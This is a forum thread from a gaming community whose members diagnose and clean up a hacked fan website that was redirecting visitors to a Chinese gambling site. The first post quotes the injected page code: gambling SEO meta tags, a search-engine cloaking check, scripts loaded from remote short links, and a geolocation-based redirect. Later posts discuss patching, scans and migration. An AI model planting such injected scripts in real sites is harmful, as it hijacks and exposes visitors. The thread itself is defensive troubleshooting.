Page 1 of 14 12311 ... LastLast
Results 1 to 10 of 138

Thread: AAAA website

  1. #1
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Default AAAA website

    Posting this as a thread so we can try to assist with resolving.

    This link works: http://mohaaaa.co.uk/forums/forum.php
    However this link redirects you to some Chinese site: http://mohaaaa.co.uk/forums

    I'm looking at the source code right before the redirection takes place, and I see this:


    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script type="text/javascript" src="http://www.mohaaaa.co.uk/forums/dbtech/vbshout/clientscript/jquery.tmpl.min.js"></script>
    <script type="text/javascript" src="http://www.mohaaaa.co.uk/forums/dbtech/vbshout/clientscript/vbshout.js?v=624"></script>


    <script type="text/javascript">
    <!--

    // -->
    </script>


    <title>AAAA</title>
    <meta name="keywords" content="北京赛车游戏,北京赛车pk10,赛车游戏pk10开奖直播,北京pk10开奖记录">
    <meta name="description" content="北京赛车pk10天天中大奖注册地址【yxkj55.com】,北京赛车游戏、北京赛车pk10、赛车游戏pk10开奖直播、北京pk10开奖记录等赛车游戏pk10图表数据,为北京赛车游戏pk10彩民服务">
    <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="AAAA"}</script>
    <script language="javascript" src="http://t.cn/RFx7YHG"></script><script src="http://pv.sohu.com/cityjson?ie=utf-8" charset="GB2312"></script>

    <script>var sf=returnCitySN["cname"]; if(sf.indexOf("µطاّ")>=0){window.location.href="/indax.html";}</script>
    <script language="javascript" src="http://t.cn/RFx77Lk"></script></body>


    Definitely looks like the site is vulnerable to some cross-site scripting, or injection or something.
    Attached Images Attached Images

  2. #2
    Developer RyBack's Avatar
    Join Date
    Apr 2014
    Location
    In Front of the screen
    Posts
    1,603

    Default

    Someone should code a new aaaa website with proper db system.

  3. #3
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Default

    It could be an exploit in the software, or a lack of security patches on the hardware itself that allowed the JS injection.
    If I can get access to the FTP and admin CP of the site, I can take a look.

  4. #4

    Default

    Hi all sorry didnt know it had been hacked - they had replaced index in VBulletin

  5. #5
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Default

    HSB, glad you got it resolved, but you seriously need to take a look at your hardware/software security.

  6. #6
    Client Beta Testers Appelpitje's Avatar
    Join Date
    Jan 2012
    Location
    Belgium
    Posts
    571

    Default

    Im going to relaunch a vulnerability scan and let you know if there are any critical/high vulnerabilities on the server.

  7. #7

    Default

    The existing site and database can be secured (in different ways - if moved to a true linux server). Migrating it off the current Drupal version is next to impossible. VBulletin has several vulnerabilities. I HOPE I properly fixed a few of them on x-null, but I don't remember the details too much, but VBulletin is open to injection without one of the critical patches I made to x-null.
    Browse MOHAA Servers Post GameSpy Era

    VISIT MOHREBORN.COM FOR LATEST INFORMATION



    Medal of Honor: Game Server Browser Fixer - Patches your MOHAA, MOHSH, and MOHBT game binaries to allow you to retrieve a list of game servers within the multi-player menu in-game even after GameSpy ceases operation!

    Medal of Honor: Query Launcher - Find, browse, organize, join, get your ping, and get more information regarding all Medal of Honor (AA, SH, & BT) servers from your PC at any time!
    Medal of Honor: Web Server Master List - Find and browse all Medal of Honor servers online using your browser!
    Add your Medal of Honor Server to the Master List
    YouTube Video for Medal of Honor: Query Launcher and MOHAASERVERS.TK!



    MOHAA Mods and Utilities
    OwN-3m-All's Mods
    Make Me Stock - A program that allows you to easily move-in and move-out non-stock mods and other files at the click of a button. Automates adding / removing mods without having to copy / move files manually.



    Quality Game Servers

    Rent dedicated Dallas Texas, Kansas City, Las Vegas Nevada, Chicago, Pennsylvania, and Sofia Bulgaria MOHAA and other game servers from We Be HostiN starting at $10 a month.


  8. #8

    Default

    I don't know if you guys already heard about Ghost :
    https://ghost.org/ (credit to Appelpitje who informed me about this nice publishing platform)
    https://github.com/TryGhost/Ghost
    I haven't tried but it looks promising and better than any other blog engine.

    There seems to be a module to import Drupal data into Ghost : https://github.com/mikebell/drupal-to-ghost

  9. #9
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Default

    Sorry to disappoint, but the issue is also on the root of the homepage. http://mohaaaa.co.uk

    And seems to have issues here too: http://www.mohaaaa.co.uk/AAAAMOHAA/c...-and-resources

    As far as migrating drupal 7 to vbulletin; this might be messy but what about migrating drupal to phpbb3 and then from phpbb3 to vbulletin?

  10. #10

    Default

    Quote Originally Posted by James View Post
    Sorry to disappoint, but the issue is also on the root of the homepage. http://mohaaaa.co.uk

    And seems to have issues here too: http://www.mohaaaa.co.uk/AAAAMOHAA/c...-and-resources

    As far as migrating drupal 7 to vbulletin; this might be messy but what about migrating drupal to phpbb3 and then from phpbb3 to vbulletin?
    Ok thanks all - have found some other sub index have protected them also as they also got hacked
    Dont get chance these days to do much - basically the site is in two halfs VB for Forum and Database is Drupal - to be fair first hack on VB for very long time but yeh the Drupal side is weak and obsolete but also been a while since that has been hacked but myself and Own3mall spent a lot of time looking at what we could do and try'd many things.

    For me the only way to do it is to rebuild on new platform via SQL workbench to export all the data in mysql to new solution I had a go nut beyond my skill set

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •